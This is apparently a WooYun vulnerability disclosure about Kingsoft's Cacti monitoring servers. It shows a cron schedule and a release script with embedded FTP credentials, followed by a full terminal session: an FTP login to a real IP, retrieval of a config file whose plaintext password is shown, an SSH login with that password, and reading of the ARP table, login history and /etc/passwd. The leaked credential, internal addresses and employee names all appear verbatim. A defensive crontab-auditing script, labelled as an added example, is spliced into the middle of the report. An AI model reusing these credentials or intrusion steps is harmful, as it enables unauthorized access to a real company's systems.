WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ---------------- http://drop.zone.ci/

Timeline:
2012-04-16: Details reported to the vendor, awaiting the vendor's response
2012-04-17: Vendor confirmed; details disclosed to the vendor only
2012-04-27: Details disclosed to core white hats and experts in the relevant field
2012-05-07: Details disclosed to regular white hats
2012-05-17: Details disclosed to intern white hats
2012-05-31: Details disclosed to the public
To monitor its servers in real time, Kingsoft Software Group developed and deployed its own Cacti-based monitoring service on its servers. Security was not taken into account when it was deployed, leaving several serious weaknesses that could expose a large number of Kingsoft Software Group servers to attack.

Once an attacker has gained access to any one Kingsoft Software Group server, looking at that server's cron schedule shows:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /opt/kingsoft/monitor/core/task/cron.hourly
02 4 * * * root run-parts /opt/kingsoft/monitor/core/task/cron.daily
22 4 * * 0 root run-parts /opt/kingsoft/monitor/core/task/cron.weekly
42 4 1 * * root run-parts /opt/kingsoft/monitor/core/task/cron.monthly
03 * * * * root run-parts /opt/kingsoft/monitor/core/task/cron
#30 * * * * root rdate -s time-a.nist.gov
35 3 * * * root sh /opt/kingsoft/monitor/core/cron/modifypassword.sh
30 * * * * root /opt/kingsoft/monitor/core/cron/utctime.sh 00 /opt/kingsoft/monitor/core/cron/tasksleep.sh 120 /opt/kingsoft/monitor/core/taskdata/info_collection/script/info_collection_upload.sh
*/15 * * * * root /opt/kingsoft/monitor/core/cron/update.sh >>/dev/null 2>&1

This shows that Kingsoft's monitor service keeps all of its state in plain files, and that access to those files is not restricted in any way. As a result the passwords of several system services are exposed, which seriously affects every monitored server. Kingsoft Software Group's Cacti server: http://221.4.212.203/index.php
/opt/kingsoft/monitor/core/cron/cactirelease.sh
#/bin/sh
#This Script is intelligent Cacti's MonitorScript.tar release Tool
MonitorScriptPath=/opt/kingsoft/monitor
KingsoftHome=/opt/kingsoft
CrontFile=/etc/crontab
FtpHostChinatel=125.89.65.196
FtpHostIntranet=192.168.55.130
FtpHostCncnet=221.4.212.203
UserName=cacti****
PassWord=**********
GetFile=monitorbase
GetTar=monitordrelease.tar
ChinaTel=chinatelecom
CncNet=chinaunicom
Intranet=intranet
User=ftp_update_user.sh
updateCactiFile=main.sh
rsyncFile=update.sh
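The crontab and the release script above show the pattern this report is about: a credential written straight into a shell script that cron runs as root, in a file that any local account can read. The audit script below is an added example, not the reporter's code and not part of Kingsoft's monitoring package. It parses a system crontab in /etc/crontab format, follows every absolute path a cron line references, and flags scripts that are readable by group or others or that contain a credential-looking assignment or a psftp-style `-pw` argument. The crontab, the script names and their contents are constructed in a temporary directory for the demonstration.

```python
"""Audit the scripts a system crontab runs for loose permissions and embedded secrets.

Added example (not the reporter's or Kingsoft's code). The crontab and scripts
it inspects are constructed in a temporary directory by build_demo().
"""
import os
import re
import stat
import tempfile

# Patterns that usually mean a credential is sitting in plain text.
SECRET_PATTERNS = [
    re.compile(r"(?i)\b(pass(word|wd)?|pwd|secret|token)\b\s*=\s*\S+"),  # PassWord=...
    re.compile(r"(?i)(^|\s)-pw\s+\S+"),  # psftp/plink style password on the command line
]

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week


def parse_crontab(text):
    """Return (schedule, user, command) tuples from /etc/crontab-style text."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split(None, CRON_FIELDS + 1)
        if len(parts) < CRON_FIELDS + 2:
            continue
        entries.append((" ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS], parts[CRON_FIELDS + 1]))
    return entries


def referenced_paths(command):
    """Absolute paths mentioned anywhere in a cron command, arguments included."""
    return [tok for tok in command.split() if tok.startswith("/") and not tok.startswith("/dev/")]


def scan_file(path):
    """Findings for one script: (path, 'mode', octal mode) and (path, 'secret', line number)."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return findings
    if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):  # readable beyond the owner
        findings.append((path, "mode", oct(stat.S_IMODE(st.st_mode))))
    if not stat.S_ISREG(st.st_mode):
        return findings
    with open(path, errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if any(p.search(line) for p in SECRET_PATTERNS):
                findings.append((path, "secret", lineno))
    return findings


def audit_crontab(crontab_path):
    """Scan every script referenced by the crontab; findings carry the cron user first."""
    findings = []
    with open(crontab_path) as fh:
        entries = parse_crontab(fh.read())
    seen = set()
    for _schedule, user, command in entries:
        for path in referenced_paths(command):
            if path not in seen:
                seen.add(path)
                findings.extend((user,) + f for f in scan_file(path))
    return findings


def build_demo():
    """Create a constructed crontab plus one leaky and one clean script; return the crontab path."""
    root = tempfile.mkdtemp(prefix="cronaudit-")
    leaky = os.path.join(root, "release.sh")
    clean = os.path.join(root, "rotate.sh")
    with open(leaky, "w") as fh:
        fh.write("#!/bin/sh\n"
                 "# constructed: same shape as a deploy script with its FTP login inside\n"
                 "FtpHost=192.0.2.10\n"
                 "UserName=deploy\n"
                 "PassWord=hunter2-example\n"
                 "psftp -pw $PassWord -batch deploy@192.0.2.11\n")
    with open(clean, "w") as fh:
        fh.write("#!/bin/sh\n"
                 "# constructed: reads its secret from a root-only file instead\n"
                 "PASSFILE=/etc/deploy/ftp.pass\n")
    os.chmod(leaky, 0o644)  # world-readable: the weakness the report describes
    os.chmod(clean, 0o700)  # owner-only
    crontab = os.path.join(root, "crontab")
    with open(crontab, "w") as fh:
        fh.write("SHELL=/bin/bash\nPATH=/sbin:/bin\nMAILTO=root\n# constructed system crontab\n"
                 f"*/15 * * * * root {leaky} >>/dev/null 2>&1\n"
                 f"35 3 * * * root sh {clean}\n")
    return crontab


if __name__ == "__main__":
    for user, path, kind, detail in audit_crontab(build_demo()):
        print(f"[{kind}] cron user {user}: {path} ({detail})")
```

Run against a real host the same function takes `/etc/crontab` and the files under `/etc/cron.d`; run-parts directories show up as mode findings only, so walk them separately if needed. A hit of either kind is the cue to move the credential out of the script into a root-only file (mode 0600) or, for the sftp case, onto a dedicated key with a restricted `authorized_keys` entry, and to rotate the value that was exposed.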
[root@localhost ~]# ftp 221.4.212.203
Connected to 221.4.212.203.
220 Welcome into WOL FTP.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
KERBEROS_V4 rejected as an authentication type
Name (221.4.212.203:root): cactirsync
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (221,4,212,203,189,188)
150 Here comes the directory listing.
-rw------- 1 503 503 7180233 Jan 25 2010 2010-01-24.log.rar.gz
-rw------- 1 503 503 1376886 Jan 25 2010 2010-01-25.log.rar.gz
drwx------ 2 503 503 4096 Oct 28 2008 22
-rw------- 1 503 503 939956 Feb 22 2010 7z465.exe
-rw------- 1 503 503 40093040 Oct 29 2008 DUBA080922_PACIFIC_48_202.exe
-rw------- 1 503 503 6181549 Feb 22 2010 FileZilla_3.3.2_win32.zip
drwx------ 2 503 503 4096 Oct 27 2008 MagicSetbetadiy
-rw------- 1 503 503 892980 Aug 15 2010 RTX(腾讯通)企业内部通信平台.rar
-rw------- 1 503 503 465772 Jul 04 2011 S5120EI-BTM-107.btm
-rw------- 1 503 503 9119894 Jul 04 2011 S5120EI-CMW520-R2202P20-S168.bin
-rw------- 1 503 503 924880 Mar 15 2010 WinPcap_4_1_1.exe
-rw------- 1 503 503 618024 Oct 24 2008 Windows2000-KB958644-x86-CHS.EXE
-rw------- 1 503 503 3600 Mar 19 2010 cactirelease.sh
drwxr-xr-x 5 0 0 32768 Jan 20 2010 clientdata
-rw------- 1 503 503 12657950 Mar 15 2010 ethereal-setup-0.10.14.exe
-rw------- 1 503 503 20032944 Oct 29 2008 ftcsetup_huajun.zip
drwx------ 5 503 503 4096 Aug 18 2009 gateway
-rw------- 1 503 503 16389120 Aug 18 2009 gateway-dx.tar
-rw------- 1 503 503 13705 May 12 2010 index.php
-rw------- 1 503 503 388381 Apr 23 2009 [email protected]
drwx------ 11 503 503 4096 Apr 20 2010 monitor
-rw------- 1 503 503 572541 Jun 16 2009 monitor-windows.zip
-rw------- 1 503 503 535603 Apr 18 2010 monitor.rar
-rw------- 1 503 503 500166 Mar 16 2010 monitor.zip
-rw------- 1 503 503 679427 May 05 2010 monitor_221.23.zip
drwx------ 2 503 503 4096 Aug 12 2008 monitor_new
-rw------- 1 503 503 557953 Apr 21 2010 monitor_windows_100420.zip
drwxr-xr-x 2 503 503 4096 Nov 19 2010 monitorbase
-rw------- 1 503 503 551275 Jun 10 2010 monitorwindows100610.zip
-rw------- 1 503 503 5213 Nov 19 2008 my.txt
drwx------ 4 503 503 4096 Sep 01 2010 newcode
drwx------ 2 503 503 4096 Apr 16 2010 nt
-rw------- 1 503 503 12046184 Nov 10 2008 php-5.2.6.tar.gz
-rw------- 1 503 503 4384117 Oct 10 2011 pq8.rar
-rw------- 1 503 503 465290 Apr 21 2009 pure-ftpd-1.0.21.tar.bz2
drwx------ 9 503 503 4096 Aug 19 2009 queryapp
-rw------- 1 503 503 445062 Apr 20 2010 safecenter.zip
-rw------- 1 503 503 25170201 Apr 20 2011 stat_white.db-2011-03-30-61.136.58.29.gz
-rw------- 1 503 503 129996 Mar 09 2010 sysstat-5.0.5-25.el4.x86_64.rpm
drwx------ 3 503 503 4096 Jan 13 2010 zhangwenbin
drwx------ 2 503 503 4096 Jun 02 2009 天津小树林
drwx------ 2 503 503 4096 Jun 02 2009 珠海IDC
-rw------- 1 503 503 763 Jul 05 2011 鍌叉父 3.lnk
drwx------ 3 503 503 4096 Sep 01 2010 鏈懡鍚嶆枃浠跺す
226 Directory send OK.
ftp> cd /monitor/configbase/cncconfig
250 Directory successfully changed.
ftp> ls
227 Entering Passive Mode (221,4,212,203,219,54)
150 Here comes the directory listing.
-rw------- 1 503 503 192 Apr 20 2010 infoservers.cfg
-rw------- 1 503 503 195 Apr 20 2010 sftpservers.cfg
226 Directory send OK.
ftp> get sftpservers.cfg
local: sftpservers.cfg remote: sftpservers.cfg
227 Entering Passive Mode (221,4,212,203,152,246)
150 Opening BINARY mode data connection for sftpservers.cfg (195 bytes).
226 File send OK.
195 bytes received in 2.6e-05 seconds (7.3e+03 Kbytes/s)
ftp> quit
221 Goodbye.
[root@localhost ~]# cat sftpservers.cfg
c:\monitor\lib\monitor_psftp.exe -pw je2@J*9zg6wnfwjh32h3bf45b -bc -noagent -v -batch -b c:\monitor\config\common\sftpscript.cfg [email protected] 1>c:\monitor\log\s221.4.212.203.log 2>&1
[root@localhost ~]#
[root@localhost ~]# ssh [email protected]
[email protected]'s password:
Last login: Fri Feb 17 11:13:07 2012 from 27.154.32.246
[cactiuser@wol-monitor-svr ~]$ which ifconfig
/usr/bin/which: no ifconfig in (/usr/kerberos/bin:/usr/local/java/bin:/usr/local/java/jre/bin:/usr/local/bin:/bin:/usr/bin:/data/web/data/clientdata//bin)
[cactiuser@wol-monitor-svr ~]$ /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr B8:AC:6F:12:0A:6A
          inet addr:10.20.220.13  Bcast:10.20.221.255  Mask:255.255.254.0
          inet6 addr: fe80::baac:6fff:fe12:a6a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2531200998 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2436331652 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:965258989840 (898.9 GiB)  TX bytes:405395637146 (377.5 GiB)
          Interrupt:90 Memory:d6000000-d6012100

eth1      Link encap:Ethernet  HWaddr B8:AC:6F:12:0A:6C
          inet addr:10.20.216.5  Bcast:10.20.216.255  Mask:255.255.255.0
          inet6 addr: fe80::baac:6fff:fe12:a6c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:13898508 errors:0 dropped:0 overruns:0 frame:0
          TX packets:737578 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2324752165 (2.1 GiB)  TX bytes:133218008 (127.0 MiB)
          Interrupt:98 Memory:d8000000-d8012100

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:182264 errors:0 dropped:0 overruns:0 frame:0
          TX packets:182264 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:20658245 (19.7 MiB)  TX bytes:20658245 (19.7 MiB)

[cactiuser@wol-monitor-svr ~]$ arp -a
-bash: arp: command not found
[cactiuser@wol-monitor-svr ~]$ /sbin/arp
Address                  HWtype  HWaddress           Flags Mask            Iface
10.20.216.240            ether   00:15:17:25:4B:73   C                     eth1
doc.rdev.kingsoft.net    ether   00:50:56:A2:00:03   C                     eth0
10.20.220.224            ether   00:1E:0B:BF:80:34   C                     eth0
10.20.220.229            ether   00:24:E8:55:FB:16   C                     eth0
10.20.220.237            ether   00:30:48:D6:14:F0   C                     eth0
10.20.216.251            ether   98:4B:E1:6F:33:EC   C                     eth1
10.20.216.249            ether   00:24:8C:3C:C7:EB   C                     eth1
10.20.221.150            ether   00:10:5C:FA:F2:14   C                     eth0
dubabin.s.kingsoft.net   ether   00:21:5A:4E:D7:E8   C                     eth0
10.20.216.4              ether   00:22:19:64:43:F0   C                     eth1
10.20.221.222            ether   00:21:97:42:8C:0C   C                     eth0
10.20.220.238            ether   00:30:48:D6:14:D6   C                     eth0
10.20.220.225            ether   00:1E:0B:C0:09:0A   C                     eth0
10.20.221.226            ether   00:24:81:AA:9A:84   C                     eth0
10.20.220.242            ether   00:30:48:D6:14:9E   C                     eth0
cm.wol2.com              ether   00:26:B9:FC:96:38   C                     eth0
10.20.221.117            ether   00:1F:D0:0C:51:78   C                     eth0
10.20.216.14             ether   00:50:56:88:2A:5C   C                     eth1
10.20.220.233            ether   00:24:E8:59:32:7F   C                     eth0
10.20.221.215            ether   00:26:B9:44:E5:A2   C                     eth0
10.20.220.1              ether   00:0F:E2:C7:64:94   C                     eth0
10.20.221.12             ether   00:50:56:88:55:53   C                     eth0
10.20.220.236            ether   00:24:E8:4F:54:8D   C                     eth0
10.20.216.189            ether   00:18:71:68:70:DA   C                     eth1
10.20.216.246            ether   00:1F:C6:65:FB:31   C                     eth1
10.20.220.240            ether   00:30:48:D6:14:A0   C                     eth0
10.20.220.239            ether   00:30:48:D6:15:68   C                     eth0
10.20.216.150            ether   00:30:48:33:30:34   C                     eth1
10.20.220.223            ether   00:1E:0B:C0:09:EE   C                     eth0
10.20.221.115            ether   00:21:97:07:2E:4C   C                     eth0
10.20.221.26             ether   00:50:56:88:44:E7   C                     eth0
10.20.216.215            ether   00:1E:90:83:71:48   C                     eth1
10.20.216.198            ether   00:18:71:68:70:A6   C                     eth1
10.20.221.181            ether   00:1A:4B:AD:EC:7A   C                     eth0
10.20.220.222            ether   00:24:E8:54:51:60   C                     eth0
10.20.221.35             ether   00:18:71:68:70:34   C                     eth0
10.20.221.152            ether   00:30:48:35:01:78   C                     eth0
s.kingsoft.net           ether   00:50:56:88:18:27   C                     eth0
10.20.221.101            ether   00:1E:0B:BE:4D:E4   C                     eth0
10.20.216.18             ether   00:1E:90:83:73:24   C                     eth1
10.20.221.119            ether   00:23:54:8D:2D:98   C                     eth0
10.20.216.193            ether   00:18:71:68:64:48   C                     eth1
10.20.221.13             ether   00:50:56:88:5A:4A   C                     eth1
10.20.216.233            ether   00:16:EC:48:83:8C   C                     eth1
10.20.220.231            ether   00:24:E8:51:79:18   C                     eth0
10.20.216.244            ether   00:24:8C:3C:C7:E9   C                     eth1
10.20.216.231            ether   00:15:17:2C:5C:62   C                     eth1
10.20.221.24             ether   00:50:56:88:33:38   C                     eth0
10.20.220.235            ether   00:24:E8:51:9F:B0   C                     eth0
10.20.221.16             ether   00:14:C2:3A:FB:26   C                     eth0
trac.s.kingsoft.net      ether   00:1E:90:81:6E:A0   C                     eth0
res.rdev.kingsoft.net    ether   00:50:56:88:58:37   C                     eth0
dp2.wol2.com             ether   00:22:19:68:E6:5E   C                     eth0
10.20.221.89             ether   00:50:56:88:05:65   C                     eth0
10.20.220.230            ether   00:22:19:BF:82:37   C                     eth0
10.20.221.17             ether   00:50:56:88:2F:C9   C                     eth0
10.20.221.38             ether   00:50:56:4E:BA:29   C                     eth0
10.20.220.241            ether   00:30:48:D4:5E:AA   C                     eth0
10.20.220.253            ether   00:30:48:D6:14:CE   C                     eth0
10.20.216.151            ether   00:22:19:66:B1:CE   C                     eth1
10.20.216.209            ether   00:10:5C:CA:9C:74   C                     eth1
10.20.216.237            ether   D4:85:64:4C:32:AA   C                     eth1
10.20.220.232            ether   00:24:E8:4F:3F:D5   C                     eth0
10.20.221.45             ether   00:1E:8C:3A:AD:D8   C                     eth0
10.20.216.15             ether   00:50:56:88:7C:9B   C                     eth1
10.20.220.100            ether   98:4B:E1:6C:0A:16   C                     eth0
10.20.216.194            ether   00:18:71:68:70:12   C                     eth1
10.20.221.27             ether   00:24:E8:54:52:40   C                     eth0
10.20.220.243            ether   00:30:48:D6:13:80   C                     eth0
10.20.221.30             ether   00:50:56:88:02:6C   C                     eth0
10.20.216.246            ether   00:1F:C6:65:FB:31   C                     eth0
dp1.wol2.com             ether   00:22:19:69:5D:D9   C                     eth0
10.20.221.127            ether   00:1F:D0:0C:4F:7C   C                     eth0
10.20.216.185            ether   00:18:71:68:70:04   C                     eth1
10.20.216.196            ether   00:10:5C:FA:4D:7A   C                     eth1
10.20.221.15             ether   00:50:56:88:77:8B   C                     eth0
10.20.220.228            ether   00:24:E8:55:EB:57   C                     eth0
10.20.216.196            ether   00:10:5C:FA:4D:7A   C                     eth0
10.20.216.195            ether   00:18:71:68:64:30   C                     eth1
10.20.221.13             ether   00:50:56:88:5A:4A   C                     eth0
10.20.221.85             ether   00:50:56:88:78:01   C                     eth0
10.20.216.215            ether   00:1E:90:83:71:48   C                     eth0
10.20.216.217            ether   00:A0:D1:E0:78:E3   C                     eth1
10.20.220.234            ether   00:24:E8:51:7C:24   C                     eth0
10.20.220.227            ether   00:24:E8:59:32:01   C                     eth0
[cactiuser@wol-monitor-svr ~]$ last
cactiuse pts/0        59.39.*.*        Mon Apr 16 14:20   still logged in
lijianhu pts/0        10.20.221.11     Fri Apr  6 15:45 - 18:55  (03:09)
reboot   system boot  2.6.18-128.1.10. Fri Apr  6 15:13          (9+23:07)
zhaohaij pts/1        10.20.221.11     Mon Apr  2 15:50 - 18:09  (1+02:19)
zhaohaij pts/1        10.20.221.11     Mon Apr  2 15:38 - 15:50  (00:11)
zhaohaij pts/1        10.20.221.11     Mon Apr  2 15:33 - 15:36  (00:03)
wangxiao pts/1        10.20.221.11     Sun Apr  1 19:27 - 19:29  (00:02)
wangxiao pts/1        10.20.221.11     Sun Apr  1 19:22 - 19:24  (00:01)
wangxiao pts/1        10.20.221.11     Sun Apr  1 19:04 - 19:12  (00:08)
wangxiao pts/1        10.20.221.11     Sun Apr  1 19:02 - 19:04  (00:01)
wangxiao pts/2        10.20.221.11     Sun Apr  1 11:56 - 14:11  (02:14)
wangxiao pts/1        10.20.221.11     Sun Apr  1 11:53 - 14:11  (02:17)
wangxiao pts/1        10.20.221.11     Tue Mar 27 17:25 - 17:37  (00:11)
lijianhu pts/1        10.20.221.11     Mon Mar 26 16:34 - 20:43  (04:09)
wangxiao pts/1        10.20.221.11     Wed Mar 21 14:58 - 17:09  (02:11)
xieyi    pts/1        10.20.221.11     Wed Mar 21 12:01 - 12:53  (00:52)
lijianhu pts/1        10.20.221.11     Wed Mar 14 10:01 - 10:38  (00:36)
zhaohaij pts/1        10.20.221.11     Wed Mar  7 15:57 - 16:01  (00:04)
zhaohaij pts/2        10.20.221.11     Fri Mar  2 10:53 - 17:06  (06:12)
liangxia pts/1        10.20.221.11     Fri Mar  2 10:24 - 18:16  (07:52)
zhaohaij pts/1        10.20.221.11     Thu Mar  1 19:34 - 10:08  (14:33)
liangxia pts/1        10.20.221.11     Thu Mar  1 17:09 - 18:01  (00:51)
xieyi    pts/1        10.20.221.11     Thu Mar  1 14:45 - 15:02  (00:16)
zhop     pts/1        10.20.188.177    Thu Mar  1 09:29 - 09:33  (00:03)
liangxia pts/1        10.20.221.11     Tue Feb 28 10:11 - 10:26  (00:14)
zhaohaij pts/1        10.20.221.11     Mon Feb 27 16:35 - 17:47  (01:11)
zhaohaij pts/2        10.20.221.11     Mon Feb 27 16:34 - 16:35  (00:01)
zhaohaij pts/1        10.20.221.11     Mon Feb 27 14:54 - 16:33  (01:39)
zhop     pts/1        113.106.106.29   Mon Feb 27 10:40 - 11:54  (01:14)
wangxiao pts/1        10.20.221.11     Fri Feb 24 20:30 - 20:32  (00:02)
lijianhu pts/1        10.20.221.11     Thu Feb 23 22:22 - 23:25  (01:03)
lijianhu pts/1        10.20.221.11     Thu Feb 23 14:31 - 14:31  (00:00)
zhop     pts/2        202.105.182.222  Wed Feb 22 16:11 - 19:56  (03:45)
zhop     pts/1        202.105.182.222  Wed Feb 22 16:08 - 19:56  (03:48)
zhop     pts/1        202.105.182.222  Wed Feb 22 10:53 - 11:37  (00:43)
zhaohaij pts/2        10.20.221.11     Sun Feb 19 19:45 - 21:35  (01:50)
zhaohaij pts/2        125.89.65.194    Sun Feb 19 19:43 - 19:45  (00:01)
zhaohaij pts/2        125.89.65.194    Sun Feb 19 19:43 - 19:43  (00:00)

wtmp begins Sun Feb 19 19:43:10 2012
[cactiuser@wol-monitor-svr ~]$ cat /etc/issue
CentOS release 5.3 (Final)
Kernel \r on an \m

[cactiuser@wol-monitor-svr ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
htt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologin
cactiuser:x:502:502::/data/web/data/clientdata/:/bin/bash
vsftpd:x:503:503::/home/vsftpd:/bin/bash
kautoadduser:x:512:512::/home/kautoadduser:/bin/bash
monitor:x:514:514::/home/monitor:/bin/bash
cactiuser1:x:518:518::/data/web/data/clientdata1:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
zhop:x:522:522::/home/zhop:/bin/bash
lijianhui:x:523:523::/home/lijianhui:/bin/bash
liaozhigang:x:525:525::/home/liaozhigang:/bin/bash
wangxiaozhou:x:526:526::/home/wangxiaozhou:/bin/bash
zhaoyiding:x:527:527::/home/zhaoyiding:/bin/bash
xieyi:x:528:528::/home/xieyi:/bin/bash
zhaohaijun:x:529:529::/home/zhaohaijun:/bin/bash
liangxiaocong:x:530:530::/home/liangxiaocong:/bin/bash
[cactiuser@wol-monitor-svr ~]$ exit
logout
Connection to 221.4.212.203 closed.
Suggested fix: update the monitoring service architecture.
Severity: High
Vulnerability Rank: 20
Confirmed: 2012-04-17 10:38
Vendor reply: Thank you! We will patch it right away!
Latest status: none yet.